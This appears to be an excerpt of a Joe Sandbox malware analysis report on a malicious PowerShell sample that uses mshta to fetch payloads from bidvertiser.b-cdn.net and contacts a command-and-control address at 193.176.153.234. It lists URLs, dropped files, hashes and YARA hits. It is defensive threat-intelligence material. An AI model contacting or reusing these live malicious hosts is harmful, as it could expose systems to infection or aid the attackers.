                https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.1922955102.000001EC25BE9000.00000004.00000800.00020000.00000000.sdmpfalse
                • 1%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                https://bidvertiser.b-cdn.net/smart1Umshta.exe, 00000003.00000002.2371901544.000002376E1A0000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://bidvertiser.b-cdn.net/smart1entVmshta.exe, 00000003.00000002.2369176557.0000022F67098000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://bidvertiser.b-cdn.net/smart1c9xmshta.exe, 00000003.00000002.2369290267.0000022F670B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2367255449.0000022F670B0000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://193.176.153.234/587ec30955d49a9c.php/BitLockerToGo.exe, 0000000B.00000002.2079531848.0000000003300000.00000004.00000020.00020000.00000000.sdmpfalse
                • 2%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                https://bidvertiser.b-cdn.net/smart1(imshta.exe, 00000003.00000002.2369326741.0000022F670CD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2358601385.0000022F670CC000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://g.live.com/odclientsettings/Prod.C:edb.log.4.drfalse
                • URL Reputation: safe
                unknown
                https://protobuf.dev/reference/go/faq#namespace-conflictduration0SmartAssem.exefalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                https://bidvertiser.b-cdn.net/smart1https://bidvertiser.b-cdn.net/smart1mshta.exe, 00000003.00000003.2365006534.000002376D0B5000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://193.176.153.234/587ec30955d49a9c.phplBitLockerToGo.exe, 0000000B.00000002.2079531848.0000000003300000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://bidvertiser.b-cdn.net/smart1mmshta.exe, 00000003.00000002.2369326741.0000022F670E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2358601385.0000022F670E8000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://g.live.com/odclientsettings/ProdV2edb.log.4.drfalse
                • URL Reputation: safe
                unknown
                https://bidvertiser.b-cdn.net/h#mshta.exe, 00000003.00000003.2358841397.0000022F6711B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2369402329.0000022F6711B000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://193.176.153.234/587ec30955d49a9c.php0BitLockerToGo.exe, 0000000B.00000002.2079531848.0000000003300000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://193.176.153.2348:BitLockerToGo.exe, 0000000B.00000002.2079531848.00000000032B7000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96svchost.exe, 00000004.00000003.1732947947.00000209D8422000.00000004.00000800.00020000.00000000.sdmp, edb.log.4.drfalse
                • URL Reputation: safe
                unknown
                http://193.176.153.234BitLockerToGo.exe, 0000000B.00000002.2079531848.00000000032B7000.00000004.00000020.00020000.00000000.sdmptrue
                • 2%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                https://bidvertiser.b-cdn.net/smart1...mshta.exe, 00000003.00000003.2366441304.0000022F67131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2369689923.0000022F67131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2358841397.0000022F67131000.00000004.00000020.00020000.00000000.sdmpfalse
                • 2%, Virustotal, Browse
                • Avira URL Cloud: malware
                unknown
                https://bidvertiser.b-cdn.net/smart1:asLMEMPxmshta.exe, 00000003.00000002.2371500355.000002376BE90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2366801672.000002376BE8D000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://193.176.153.234/XBitLockerToGo.exe, 0000000B.00000002.2079531848.0000000003300000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://www.virtualbox.org/VBoxVMM.dll.5.drfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                https://aka.ms/pscore68powershell.exe, 00000000.00000002.1728419864.000001E7E169E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1723184426.00000222DA691000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1723184426.00000222DA6AD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1922955102.000001EC259C1000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://bidvertiser.b-cdn.net/smart1OOC:mshta.exe, 00000003.00000002.2369290267.0000022F670B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2367255449.0000022F670B0000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1728419864.000001E7E16CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1723184426.00000222DA691000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1922955102.000001EC259C1000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://bidvertiser.b-cdn.net/smart10mshta.exe, 00000003.00000002.2369326741.0000022F670CD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2358601385.0000022F670CC000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000004.00000003.1732947947.00000209D8422000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drfalse
                • URL Reputation: safe
                unknown
                http://193.176.153.234;BitLockerToGo.exe, 0000000B.00000002.2079531848.00000000032B7000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://193.176.153.234/587ec30955d49a9c.phpxBitLockerToGo.exe, 0000000B.00000002.2079531848.0000000003300000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                193.176.153.234 | unknown | unknown | | 207451 | AGROSVITUA | true
                185.93.1.250 | bidvertiser.b-cdn.net | Czech Republic | | 60068 | CDN77GB | true
                IP
                127.0.0.1
                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1491044
                Start date and time:2024-08-10 19:09:04 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 7m 45s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:13
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:verification.b-cdn.net.ps1
                Detection:MAL
                Classification:mal100.troj.evad.winPS1@14/24@1/3
                EGA Information:
                • Successful, ratio: 20%
                HCA Information:
                • Successful, ratio: 72%
                • Number of executed functions: 20
                • Number of non-executed functions: 18
                Cookbook Comments:
                • Found application associated with file extension: .ps1
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                • Excluded IPs from analysis (whitelisted): 184.28.90.27
                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                • Execution Graph export aborted for target 0SmartAssem.exe, PID 7716 because there are no executed function
                • Execution Graph export aborted for target mshta.exe, PID 7172 because there are no executed function
                • Execution Graph export aborted for target powershell.exe, PID 4108 because it is empty
                • Execution Graph export aborted for target powershell.exe, PID 7100 because it is empty
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtCreateKey calls found.
                • Report size getting too big, too many NtEnumerateKey calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                Time | Type | Description
                13:10:01 | API Interceptor | 2x Sleep call for process: svchost.exe modified
                13:10:03 | API Interceptor | 1x Sleep call for process: mshta.exe modified
                13:10:03 | API Interceptor | 42x Sleep call for process: powershell.exe modified
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):1310720
                              Entropy (8bit):1.3073508452922409
                              Encrypted:false
                              SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrz:KooCEYhgYEL0In
                              MD5:14CEA15C79CCB7BBDB86ACE5814A0C80
                              SHA1:53073B1A2D8A28AA7B443CC63AD3465308A8120E
                              SHA-256:14B2FF087733B3AEE35CCAB7A2D2B4E593C41D31AC14265E656B524CC0A9E807
                              SHA-512:E680032AF8C6CAD1F1DDE1E15DB6BBD01F136062A181CB6487934BF9003BC169DC8975CD07BF7D70AAD5003E9BA1E319DD494C81825B7E3550DD11DD3B26A9E9
                              Malicious:false
                              Reputation:low
                              Process:C:\Windows\System32\svchost.exe
                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0x3e63031f, page size 16384, DirtyShutdown, Windows version 10.0
                              Category:dropped
                              Size (bytes):1310720
                              Entropy (8bit):0.42213050659793255
                              Encrypted:false
                              SSDEEP:1536:JSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Jaza/vMUM2Uvz7DO
                              MD5:2F0E30157F4EE7EE6015799EB8C46DE1
                              SHA1:8AB06DB6AC4611FB15492A0B0AB5B7605D080FF0
                              SHA-256:BAA6E84FC046F1EF49B0A51F4E2C2C34D74CD055F4CD1601854039FE9B675A71
                              SHA-512:24524DA59B7F69CA3F3FABB2D5747575DD50DBE3D0C6468A2F860DF2F67FEC9EE029DAEFA48AA8FCC2C8A26C1721D0C47893C04954235EA4CD3A8283AB10CB9F
                              Malicious:false
                              Reputation:low
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):16384
                              Entropy (8bit):0.0764421126838834
                              Encrypted:false
                              SSDEEP:3:ZYeTAxjn13a/Qs1i1ollcVO/lnlZMxZNQl:ZzTAx53qtOewk
                              MD5:78AD9E1A5EB1270AD5124127BE2AE718
                              SHA1:CF4DB485A160B601AFAA37BA9DC270E1EE2B44C0
                              SHA-256:EA988054D76E1B3E3416033ED529D135DA380D68146246C22DB216323CB6C86B
                              SHA-512:541D8AC240003AFBCED101164D6ECD046462889D32125C318C3A35C061E6B5F7B1B2A6FBBCB13130EAE3FF245F79EA163BA8C64C397C52F90CD54E400CE585BE
                              Malicious:false
                              Reputation:low
                              Process:C:\Windows\System32\mshta.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):166102
                              Entropy (8bit):6.058603966920187
                              Encrypted:false
                              SSDEEP:3072:088nbom5xIAb88nbom5xIAwBo88nbom5xIAX88nbom5xIA:ByxH6yxHgyxHOyxH
                              MD5:D1FE96463BB2DB299645B3C39176D006
                              SHA1:D6A2C8367815CC28A5C16C7953AAB1CE91AA1764
                              SHA-256:760B5E6A856D503C20D46F910A2405F51944AFEF16479EBC0174EB213C2C0132
                              SHA-512:A8BA1F4EB87C4D27FC7F4C7D14D1A1FCF51B8C8155DEC4D961659D519BF21CBA4A8873D002EB482E962B5E1E9BAD46344B31480EB593D5CB7809E88EB1E1461E
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 39%
                              • Antivirus: Virustotal, Detection: 28%
                              Reputation:low
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WV...7p..7p..7p..Eu..7p..Es..7p..Et..7p..Eq..7p..7q..7p..Ex..7p..E...7p..Er..7p.Rich.7p.................PE..L...G....................R...8.......X.......p....@.................................."....@...... .......................... ...........................................T............................................................................text....Q.......R.................. ..`.data........p.......V..............@....idata...............X..............@..@.rsrc................f..............@..@.reloc...............x..............@..B................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):1472
                              Entropy (8bit):5.2923509440931396
                              Encrypted:false
                              SSDEEP:24:3NISKco4KmM6GjKbm51s4RPTu1oGoUP7m9qr9t7J0gt/NKmNUNlr8Hv9ILAle:GSU4YymI4RCaGoUP7m9qr9tK8NfUNl4G
                              MD5:C980FB559BEDEEAC21332966C8495031
                              SHA1:6B117442E20BA2666243110EEC882CC7F7BECA7D
                              SHA-256:A1B4FA49055EC744BC911CF00C1D0C56679FA38601D95269404A610C26DBC969
                              SHA-512:F68C206376A9E056D1C38CC0AE2DCFB89F85302A4AF2A151A15353C94CE06C151F981EB22C65A0B61AAB8D14412354A784D352E0EDC825C70E4D31E8F04E1BFC
                              Malicious:false
                              Preview:@...e...........+...............................................@...............|.jdY\.H.s9.!..|).......System.IO.Compression...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.4.................0..~.J.R...L........System.Data.8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                              Category:dropped
                              Size (bytes):14349824
                              Entropy (8bit):6.285808885259456
                              Encrypted:false
                              SSDEEP:98304:lFU3kOJpPTAGHhwaWHUNpG76mgW7IAiwBGrOFqTwEiPgIaWFyOZN/6xO:C9HhW0NpG7Rg2wOFqTJQgIaWsO
                              MD5:517C4A0A27D1C022A3319AF316407810
                              SHA1:70A976773A8C604EE8A22E50FFE372375B39E15B
                              SHA-256:97D308C2B061CA49A8834DFD527A1485442AAB95060AD69E54BF034E8A043C67
                              SHA-512:939DDB011DCC17DEBC691327EDD8ED1E90600C2D31AD828AF638C73E96EC82C598E6C19BD711B8ED95CF9004FD38E7D98229C2F7CCBEA3065ED85792BF40B265
                              Malicious:true
                              Yara Hits:
                              • Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: C:\Users\user\AppData\Roaming\0SmartAssem.exe, Author: Joe Security
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 18%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................$.2b....................@.............................`.......[....`... .........................................N................o..................P..................................(...................|...@............................text....0b......2b.................`.``.data....o...Pb..p...6b.............@.`..rdata....m...h...m...h.............@.`@.pdata.............................@.0@.xdata..D............V..............@.0@.bss....@.............................`..edata..N............d..............@.0@.idata...............f..............@.0..CRT....p............z..............@.@..tls.................|..............@.@..rsrc....o.......p...~..............@.0..reloc.......P......................@.0B................................................................................................................................
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):6221
                              Entropy (8bit):3.7320113956637586
                              Encrypted:false
                              SSDEEP:96:CkWz33CxHolkvhkvCCtclFZpX7eHZlFZpX7THL:CksyIRgFZp2FZpz
                              MD5:BE45883BE1AEDEDE6460C3D20A0DD5A8
                              SHA1:C88CA79E6F65EC408F21DE15C55431AB015152FB
                              SHA-256:940BE881148060BA4BDCF6D2A2888AAFCBACFAB5C1E972EC004E8D708A64385B
                              SHA-512:252E22EAFEE5FCF7CC2096C6954E7EBE6F43597FEF3224158B496DE2E9FCC71A80AC22CF8E7A8E4DDFFC79103BF57B422BE9F8039BDDFFC2EE3E078F5D2ADA4A
                              Malicious:false
                              Preview:...................................FL..................F.".. ...-/.v....]. H...z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....lJ`.H....z. H.......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y<............................%..A.p.p.D.a.t.a...B.V.1......Y:...Roaming.@......CW.^.Y:............................ ..R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.Y=...........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWS`..Windows.@......CW.^DWS`..........................i...W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.Y=.....Q...........
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):332992
                              Entropy (8bit):6.5543525498940065
                              Encrypted:false
                              SSDEEP:6144:Y08qkPN+UpD3lQCt2SI6JgEuA2GqWss4i+1gr7pGZmS0bZqXxtUPtYq5o5CT+CcN:Y0NsIUpDT2WgEjA/b
                              MD5:6615A634804DFA5071EFA1502EDA3A2B
                              SHA1:4AAAFC2F1018775B27A9305D01637437E127FCCF
                              SHA-256:056AB54B2A424D420637C2E44463813E7B3247222D7E907A1F34E22B1726AE95
                              SHA-512:19F48E08D8FB863E7387FC05B6F8A9C0B90E9FE86D5950F36265BBC746B20A723A9EDFD1E1C60BA1000B9934424A8F27EF3B5766BBE378373097A3384AAA0DB9
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7f..V...V...V.......V..09...V..09...V..09...V..09...V..>...V..~&...V...V...R..~&...V..~&...V..~&...V...V...V..~&...V..Rich.V..........PE..d...%.l`.........." ................................................................(...............................................0>...q.......................&.......Z......P.......T.......................(...P...0...............( ...........................text...O........................... ..`.rdata..............................@..@.data................p..............@....pdata...&.......(...~..............@..@.rsrc...............................@..@.reloc..P...........................@..B........................................................................................................................................................................................................................................
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):224032
                              Entropy (8bit):6.519383044005073
                              Encrypted:false
                              SSDEEP:3072:gFgYgUFb6RWyLGttBrz7UVCoAsoRrXaZqb/Lh9VEyIXveGtGgCUF:CgzU5lyWcCoKr9/LhrEyIXveGtGcF
                              MD5:BBC454DFBD919CE1524E75478582C04D
                              SHA1:4A331B6DC29C28A0D4FBEF90225448B88FD2A6FD
                              SHA-256:EAA9EFDE1704FA6ABBEF9878EECFA386E89003F23E07ADCAF641A6C741893BA1
                              SHA-512:0A41EDB08378C6930BB6D6D6E951D550129DCB07886CFC636E28903C32B8DFE49124CFFC852BC9F93058D3679C4F775D70E9F869760F82A5AF54D9DCB303A013
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........5.[...[...[......[.~.Z...[...Z...[.~.^...[.~._...[.~.X...[.0.Z...[...Z...[.0.^...[.0.[...[.0....[......[.0.Y...[.Rich..[.........PE..d....l`.........." .........F......d........................................`......+{...............................................N...m..X...x....@...........'...... U...P..(...h...T.......................(.......0............................................text............................... ..`.rdata..2...........................@..@.data...............................@....pdata...'.......(..................@..@.rsrc........@......................@..@.reloc..(....P......................@..B........................................................................................................................................................................................................................................
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):69688
                              Entropy (8bit):6.51659434190219
                              Encrypted:false
                              SSDEEP:1536:B+yAXGB5LXoJG+pT42hujrgmCETk+n7M5x0:B1AWBxYl2tTk+nZ
                              MD5:A802413B13E45C7D526705CBD3974AE5
                              SHA1:2A9A4AC71150AF10718184FA283F7B8639685D57
                              SHA-256:9FDC76DA45016187D325B992B83980227112BA14ED1CB3A2DEA8929046163A13
                              SHA-512:41D6C870F387C84470E377E71EAB9BBCDEAB5F145BDF79C4ECE5C4825D7E9E74C88F6A81D53C87D83DD508A51203DDB8E95B2E425529CA67023C52DA1BDB3694
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ..................0...@.......https://www.virtualbox.org/ ....VirtualBox executable built for NT or later...$.......!..L.!VBoxa..%v..%v..%v......!v..,...!v.....'v..w...5v..w...-v..w...&v..%v..]v..w..."v..... v.....$v...z.$v.....$v..Rich%v..................PE..d....:.e.........." .....n...X.......s.....................................................A........................................0...\....................... .......8L.............T...........................0...8............................................text....l.......n.................. ..`.rdata...<.......>...r..............@..@.data...............................@....pdata.. ...........................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):80104
                              Entropy (8bit):6.692796481442946
                              Encrypted:false
                              SSDEEP:1536:lBIMzx4IWhzEqAh+e/Zt+LJgKr6TuZ7CO7EO0ydGjIxU:UMaJzEqA7Z2gKr6TuZ7d7EO0J7
                              MD5:93F9F9335E95AEBD2C914971C9F6BC58
                              SHA1:88F31CD750004A830285FC25F4264E94C5A8496A
                              SHA-256:45B9BD24A786F5F9EAF3782F1C1D659FCCEE5E9B6AC941C756C43F09F0D10819
                              SHA-512:117B8A16B0D0AB2B70AEAB2C2375D0CE9CBC0D96F812E90DD1FB330AF4EE18EEDEC82007133F5A35B2055580CC2B780C547E57A96FA69993CCE7FF0EA111CB3A
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ..................0...@.......https://www.virtualbox.org/ ....VirtualBox executable built for NT or later...$.......!..L.!VBox...`Xe.3Xe.3Xe.3...2Ze.3Q.m3Ze.3...2Ze.3...2Se.3...2Pe.3...2\e.3Xe.34e.3...2[e.3...2^e.3...2Ye.3...3Ye.3...2Ye.3RichXe.3................PE..d....:.e.........." .........l...... ........................................@.............A............................................X...8...d.... ...................L...0..0...H...T...............................8...............@............................text.............................. ..`.rdata..`>.......@..................@..@.data...............................@....pdata..............................@..@.rsrc........ ......................@..@.reloc..0....0......................@..B........................................................................................................................................................................................................................................
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):22928
                              Entropy (8bit):7.128375733908998
                              Encrypted:false
                              SSDEEP:384:4XDxDEu03c+UHeMsxZB+FGs1DGiyZegiCAM+o/8E9VF0NywQB:k55F/1DGFnAMxkEN
                              MD5:9636CD28F536DD3FB438C866F28610A9
                              SHA1:AF0A1E853CF9ABFAD78E57063258AF7922726140
                              SHA-256:34E8BD19A7DD241A1275A3CF77A8A59A7DF1FC529F864F92D8548CC7E0429B26
                              SHA-512:9ED50BEC2DAFA8D759615B9CB79D1862A7BF7F947E8123D56C9D09E899B59127D892DAB66B23D8706DB3AC1472C4B06C85D2357EF996B65C54C4FD4A1FDD3C90
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                                Preview:MZ..................0...@.......https://www.virtualbox.org/ ....VirtualBox executable built for NT or later...$.......!..L.!VBoxY.....@...@...@..A...@...A...@...A...@...E...@...@...@...@...@.......@...B...@.Rich..@.........................PE..d...B:.e.........." ................@........................................P......................................................0"..T...."..<....@.......0...........I..........@ ..T............................................ ..@............................text............................... ..`.rdata....... ......................@..@.pdata.......0......................@..@.rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                Category:dropped
                                Size (bytes):5158168
                                Entropy (8bit):5.277900307934323
                                Encrypted:false
                                SSDEEP:49152:WZ9hwg0+5rUYATyBtsP3kpbNAqW9He4avD4VE4NOhAJWrTHSScjLAWqYDadZLY7:HOrgyBDAqWle9G33A2Oi
                                MD5:DBFCDD86BDA68AB53D8B50329EF713F5
                                SHA1:3A89A0C2DAA71269E1797E1BBB9F6D65BC7DE381
                                SHA-256:DDEBDB740915CDB367C3ADF61D62F7B9CF1C7535CC8EDBB7D80C9B8ADD055AFA
                                SHA-512:A57C7EC2096A0368665F624FBF9A7574081F86F9F2E04D8A9405E67FCA7295FDE60CABB543A617C0DD3B48DFE52E0F458035BFF10D7C00F9358471ED5E5A1D4D
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Preview:MZ..................0...@.......https://www.virtualbox.org/ ....VirtualBox executable built for NT or later...$.......!..L.!VBox.\.z.=z).=z).=z)sO{(.=z).E.).=z).H~(.=z).H{(.=z).R.).=z).H.(.=z).H~(.=z).Hy(.=z).={).?z).H{(.=z).H.(:=z).=z).=z).Hz(.=z).H.).=z).Hx(.=z)Rich.=z)........PE..d....:.e.........." .....J ...-..... .........................................M.....&.N....A..........................................I.......J.......L......@K......JM..k....L.....h]H.T............................]H.8............` ..............................text...MI ......J ................. ..`.rdata....*..` ...*..N .............@..@.data...@....0K.......K.............@....pdata.......@K......$K.............@..@.rsrc.........L.......L.............@..@.reloc........L.......L.............@..B........................................................................................................................................................................................................................
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):7245419
                                Entropy (8bit):7.990049890250382
                                Encrypted:true
                                SSDEEP:196608:MSMjxkmxt+ui5tDAyyr4pF67C40b+a+jkE3F6G8slsY8/uDAvz/b5i:MVjxbt+uibcyOWoW40bV+fAG8Ot8/uks
                                MD5:FF248A4222851B97D522117737C68BE7
                                SHA1:5BE3C3B32D61134CB2380A9E15D1E0468DA39415
                                SHA-256:038FAD0CD10C3CF36E3640A2EA4C079F83C7F6133E400407773BF804BC1C5F49
                                SHA-512:59F4565F74B59DD09ECE6EF36CF7D40FC6A1D7D1AE0FA8D93BC35638B087EC066553414D239F99D146FA7CE018CED44C8DB95DD70918BDB1D56B936C7BF49C1C
                                Malicious:false
